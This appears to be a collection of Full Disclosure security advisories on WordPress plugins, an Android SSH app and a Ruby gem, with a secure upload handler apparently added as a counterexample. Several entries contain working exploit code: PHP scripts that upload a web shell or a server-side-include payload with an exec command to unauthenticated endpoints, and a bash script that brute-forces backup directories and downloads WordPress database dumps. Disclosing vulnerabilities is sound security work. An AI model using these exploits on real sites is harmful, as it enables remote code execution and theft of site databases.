Title: Remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms v3.0beta Wordpress plugin
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-07
Download Site: https://wordpress.org/plugins/aviary-image-editor-add-on-for-gravity-forms
Vendor: Waters Edge Web Design and NetherWorks LLC
Vendor Notified: 2015-06-08
Advisory: http://www.vapid.dhs.org/advisory.php?v=125
Vendor Contact: plug...@wordpress.org

Description: A plugin that integrates the awesome Adobe Creative SDK (formerly Aviary) Photo / Image Editor with the Gravity Forms Plugin.

Vulnerability: There is a remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms/includes/upload.php, as an unauthenticated user can upload any file to the system, including a .php file. The upload.php doesn't check that the user is authenticated and a simple post will allow arbitrary code to be uploaded to the server.

In the file aviary-image-editor-add-on-for-gravity-forms/includes/upload.php the code doesn't check for an authenticated Wordpress user:

<?php

$filename = $_SERVER["DOCUMENT_ROOT"]."/wp-load.php";
if (file_exists($filename)) {
    include_once($filename);
} else {
    include_once("../../../../wp-load.php");
}
echo "Here";
$image_file = $_FILES['gf_aviary_file'];
if($image_file['name']!=''){
    $max_file_size = 4*1024*1024;
    $file_size = intval($image_file['size']);
    if( $file_size > $max_file_size ){
        $msg = "File Size is too big.";
        $error_flag = true;
    }
    $extension = strtolower(end(explode('.', $image_file['name'])));
    $aa_options = get_option('gf_aa_options');
    $supported_files = $aa_options['supported_file_format'];
    $supported_files = strtolower($supported_files);
    if(!$error_flag && $supported_files != '' ){
        $supported_files = explode (',', $supported_files);
        if(!in_array($extension, $supported_files)){
            $msg = "No Supported file.";
            $error_flag = true;
        }
    }
    if(!$error_flag){
        $wp_upload_dir = wp_upload_dir();
        if(!is_dir($wp_upload_dir['basedir'].'/gform_aviary')){
            mkdir($wp_upload_dir['basedir'].'/gform_aviary');
        }
        $upload_dir = $wp_upload_dir['basedir'].'/gform_aviary/';
        $upload_url = $wp_upload_dir['baseurl'].'/gform_aviary/';
        $file_name = $upload_dir.$_POST['gf_aviary_field_id'].'_'.$image_file['name'];
        if(move_uploaded_file($image_file['tmp_name'], $file_name)){
            $file_url = $upload_url.$_POST['gf_aviary_field_id'].'_'.$image_file['name'];
        }
    }
    $return_obj = array('status' => 'success', 'message' => $file_url);
    echo json_encode($return_obj);
}
?>

CVEID: 2015-4455
OSVDB:

Exploit Code:

<?php
/*Remote shell upload exploit for aviary-image-editor-add-on-for-gravity-forms v3.0beta */
/*Larry W. Cashdollar @_larry0
6/7/2015
shell will be located http://www.vapidlabs.com/wp-content/uploads/gform_aviary/_shell.php
*/

$target_url = 'http://www.vapidlabs.com/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php';
$file_name_with_full_path = '/var/www/shell.php';

echo "POST to $target_url $file_name_with_full_path";
$post = array('name' => 'shell.php', 'gf_aviary_file' => '@'.$file_name_with_full_path);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
echo "<hr>";
echo $result;
echo "<hr>";
?>
[FD] Remote file upload vulnerability in wordpress plugin videowhisper-video-presentation v3.31.17
Title: Remote file upload vulnerability in wordpress plugin videowhisper-video-presentation v3.31.17
Author: Larry W. Cashdollar, @_larry0
Date: 2015-03-29
Download Site: https://wordpress.org/plugins/videowhisper-video-presentation/
Vendor: http://www.videowhisper.com/
Vendor Notified: 2015-03-31, won't fix, http://www.videowhisper.com/tickets_view.php?t=10019545-1427810822
Vendor Contact: http://www.videowhisper.com/tickets_submit.php
Advisory: http://www.vapid.dhs.org/advisory.php?v=117

Description: From the site: VideoWhisper Video Consultation is a web based video communication solution designed for online video consultations, interactive live presentations, trainings, webinars, coaching and online collaboration with webcam support. Read more on WordPress Video Presentation plugin home page.

Vulnerability: From wp-content/plugins/videowhisper-video-presentation/vp/vw_upload.php. Allows various remote unauthenticated file uploads; among the file types is html, where only the last 4 characters of a file name are checked to match which types are allowed. Because of this .shtml can be passed through, giving remote code execution if SSI is allowed. The code does not do any user access validation and therefore anyone can upload the following files to an unsuspecting wordpress site:

.shtml,swf,.zip,.rar,.jpg,jpeg,.png,.gif,.txt,.doc,docx,.htm,html,.pdf,.mp3,.flv,.avi,.mpg,.ppt,.pps

The if (strstr($filename,'.php')) exit; can be bypassed by using the extension .Php, but the file extension check would allow files like test.Php.shtml

<?php
if ($_GET["room"]) $room=$_GET["room"];
if ($_POST["room"]) $room=$_POST["room"];

$filename=$_FILES['vw_file']['name'];

include_once("incsan.php");

sanV($room);
if (!$room) exit;

sanV($filename);
if (!$filename) exit;

if (strstr($filename,'.php')) exit;

//do not allow uploads to other folders
if ( strstr($room,"/") || strstr($room,"..") ) exit;
if ( strstr($filename,"/") || strstr($filename,"..") ) exit;

$destination="uploads/".$room."/";
if ($_GET["slides"]) $destination .= "slides/";

$ext=strtolower(substr($filename,-4));
$allowed=array(".swf",".zip",".rar",".jpg","jpeg",".png",".gif",".txt",".doc","docx",".htm","html",".pdf",".mp3",".flv",".avi",".mpg",".ppt",".pps");

if (in_array($ext,$allowed)) move_uploaded_file($_FILES['vw_file']['tmp_name'], $destination . $filename);
?>loadstatus=1

CVEID: TBD
OSVDB: TBD

Exploit Code:

videowhis_poc.php

<?php
$uploadfile="upexp.shtml";
$ch = curl_init("http://target_site/wp-content/plugins/videowhisper-video-presentation/vp/vw_upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('vw_file'=>"@$uploadfile",'name'=>'upexp.shtml','room'=>'.'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print $postResult;
?>

upexp.shtml

<html>
<!--#exec cmd="/usr/bin/date > /tmp/p" -->
this is html
</html>

The executable should be located in wordpress/wp-content/plugins/videowhisper-video-conference-integration/vc/uploads
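Both upload advisories above fail for the same reasons: no authentication, an extension check on the wrong part of the name (end(explode('.')) or substr(-4)), no inspection of the file content, and a client-chosen destination name. As an added example (not code from the aviary or videowhisper plugins, nor from the advisory author), here is an upload handler that checks the user and nonce, validates the full extension and the sniffed MIME type with WordPress's own helper, and stores the file under a random server-chosen name in a directory that refuses to execute scripts. It assumes WordPress is loaded and an Apache 2.4 front end for the .htaccess line; the field names, directory and nonce action are assumptions.

```php
<?php
// Added example, not code from any plugin above. Assumes WordPress is
// loaded (wp_upload_dir(), wp_check_filetype_and_ext(), wp_verify_nonce(),
// current_user_can(), wp_mkdir_p() and wp_unique_filename() exist).

// Allowed extension => MIME type. Matched against the text after the LAST
// dot, so "test.Php.shtml" (extension "shtml") is rejected outright.
const UPLOAD_ALLOWLIST = [
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'gif'  => 'image/gif',
    'pdf'  => 'application/pdf',
];

/**
 * Return the lowercase extension when both the client name and the file
 * contents agree with the allowlist, otherwise null.
 */
function validate_upload(string $client_name, string $tmp_path): ?string {
    $ext = strtolower(pathinfo($client_name, PATHINFO_EXTENSION));
    if (!isset(UPLOAD_ALLOWLIST[$ext])) {
        return null;
    }
    // WordPress sniffs the real content (getimagesize/finfo) and returns
    // ext/type as false when a PHP script has merely been renamed to .jpg.
    $check = wp_check_filetype_and_ext($tmp_path, $client_name, UPLOAD_ALLOWLIST);
    if ($check['ext'] !== $ext || $check['type'] !== UPLOAD_ALLOWLIST[$ext]) {
        return null;
    }
    return $ext;
}

function handle_upload(): array {
    // Anonymous requests never reach the file system.
    if (!is_user_logged_in() || !current_user_can('upload_files')
        || !wp_verify_nonce($_POST['_wpnonce'] ?? '', 'plugin_upload')) {  // assumed action
        return ['status' => 'error', 'message' => 'not authorised'];
    }
    $file = $_FILES['upload'] ?? null;   // assumed field name
    if (!$file || $file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        return ['status' => 'error', 'message' => 'no file'];
    }
    if ($file['size'] > 4 * 1024 * 1024) {
        return ['status' => 'error', 'message' => 'too large'];
    }
    $ext = validate_upload($file['name'], $file['tmp_name']);
    if ($ext === null) {
        return ['status' => 'error', 'message' => 'unsupported type'];
    }

    $uploads = wp_upload_dir();
    $dir = $uploads['basedir'] . '/plugin_uploads';   // assumed directory
    if (!is_dir($dir)) {
        wp_mkdir_p($dir);
        // Defence in depth: even if a check above is bypassed, nothing in
        // this directory is served by the PHP or SSI handlers (Apache 2.4).
        file_put_contents($dir . '/.htaccess',
            '<FilesMatch "\.(php|phtml|phar|shtml)$">' . "\nRequire all denied\n</FilesMatch>\n");
    }
    // The client never chooses the stored name or directory: no room id,
    // no field id prefix, just a random name with the verified extension.
    $name = wp_unique_filename($dir, bin2hex(random_bytes(8)) . '.' . $ext);
    if (!move_uploaded_file($file['tmp_name'], $dir . '/' . $name)) {
        return ['status' => 'error', 'message' => 'store failed'];
    }
    return ['status' => 'success', 'message' => $uploads['baseurl'] . '/plugin_uploads/' . $name];
}

header('Content-Type: application/json');
echo json_encode(handle_upload());
```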
[FD] Exploit for stealing backups on WP sites with WP-DB-Backup v2.2.4 plugin
#!/bin/bash
#Larry W. Cashdollar, @_larry0
#Will brute force and search a Wordpress target site with WP-DB-Backup v2.2.4 plugin installed for any backups done on
#20141031 assumes the wordpress database is wordpress and the table prefix is wp_
#http://www.vapid.dhs.org/advisories/wordpress/plugins/wp-db-backup-v2.2.4/
#http://thehackerblog.com/auditing-wp-db-backup-wordpress-plugin-why-using-the-database-password-for-entropy-is-a-bad-idea/
#run ./exp targetsite

DATE=20141031; #Date to search

if [ ! -e rainbow ]; then
cat << -EOF- > rbow.c
/*Create rainbow table for guessing wp-backup-db v2.2.4 backup path Larry W. Cashdollar*/
#include <stdio.h>
int main (void) {
  char string[16] = "0123456789abcdef";
  int x, y, z, a, b;
  for (x = 0; x < 16; x++)
    for (y = 0; y < 16; y++)
      for (z = 0; z < 16; z++)
        for (a = 0; a < 16; a++)
          for (b = 0; b < 16; b++)
            printf ("%c%c%c%c%c\n", string[x], string[y], string[z], string[a], string[b]);
  return(0);
}
-EOF-
echo "[+] Compiling rbow.c"
gcc rbow.c -o rbow
echo "[+] Creating rainbow table..."
./rbow > rainbow
fi

if [ ! -e found.txt ]; then
  Z=0
  K=`wc -l rainbow|awk '{print $1}'`;
  echo "[+] Searching";
  for x in `cat rainbow`; do
    CPATH="http://$1/wp-content/backup-$x/";
    RESULT=`curl -s --head $CPATH|grep 200`;
    if [ -n "$RESULT" ]; then
      echo "[+] Location $CPATH Found";
      echo "[+] Received $RESULT";
      echo $x > found.txt;
      break; #break here
    fi;
    echo -n "Percent Done: ";
    Y=`echo "scale=6;($Z/$K)*100"|bc`;
    echo -n $Y
    echo "%";
    Z=$(( $Z + 1 ));
  done
else
  x=`cat found.txt`;
fi

# Now that we have the directory lets try to locate the database backup file.
K=999;
for y in `seq -w 0 999`; do
  CPATH="http://$1/wp-content/backup-$x/wordpress_wp_$2_$y.sql"; #change WP Database Name and Table Prefix here
  RESULT=`curl -s --head $CPATH|grep 200`;
  if [ -n "$RESULT" ]; then
    echo "[+] Database backup $CPATH Found";
    echo "[+] Received $RESULT";
    wget $CPATH
    exit; #break here
  fi;
  echo -n "Percent Done: ";
  Y=`echo "scale=2;($Z/$K)*100"|bc`;
  echo -n $Y
  echo "%";
  Z=$(( $Z + 1 ));
done
[FD] Rooted SSH/SFTP Daemon Default Login Credentials
I stumbled on to this while setting up an android vulnerability testing lab.

Title: Rooted SSH/SFTP Daemon Default Login Credentials
Author: Larry W. Cashdollar, @_larry0
OSVDB-ID: 110742
Date: 9/2/2014
Download: https://play.google.com/store/apps/details?id=web.oss.sshsftpDaemon

Description: This app is a SSH terminal server AND an SFTP file server.

Vulnerability: The software comes pre-configured with a default login of User: root Password: abc123. This weak password would easily be guessed, leading to root compromise of the android system.

Recommended Fix: Request the user set the password upon installation.

Vendor: open.software.solutions[4t]gmail.com, Notified 9/3/2014

Greets to 44CON.
[FD] Remote Command Injection in Ruby Gem sfpagent 0.4.14
Title: Remote Command Injection in Ruby Gem sfpagent 0.4.14
Date: 4/15/2014
Author: Larry W. Cashdollar, @_larry0
CVE: 2014-2888
Download: http://rubygems.org/gems/sfpagent

Vulnerability: The list variable generated from the user supplied JSON[body] input is passed directly to the system() shell on line 649. If a user supplies a module name with shell metacharacters like ; they might be able to execute shell commands on the remote system as the sfpagent running user id.

637 code, body = get_data(address, port, '/modules')
638 raise Exception, "Unable to get modules list from #{name}" if code.to_i != 200
639
640 modules = JSON[body]
641 list = ''
642 schemata.each { |m|
643   list += "#{m} " if File.exist?("#{modules_dir}/#{m}") and
644     (not modules.has_key?(m) or modules[m] != get_local_module_hash(m, modules_dir).to_s)
645 }
646
647 return true if list == ''
648
649 if system("cd #{modules_dir}; #{install_module} #{address} #{port} #{list} 1>/dev/null 2>/tmp/install_module.error")
650   Sfp::Agent.logger.info "Push modules #{list}to #{name} [OK]"
651 else
652   Sfp::Agent.logger.warn "Push modules #{list}to #{name} [Failed]"
653 end
654
655 return true

Vendor: Notified 4/15/14. Version 0.4.15 fixes this issue.
Advisory: http://www.vapid.dhs.org/advisories/spfagent-remotecmd.html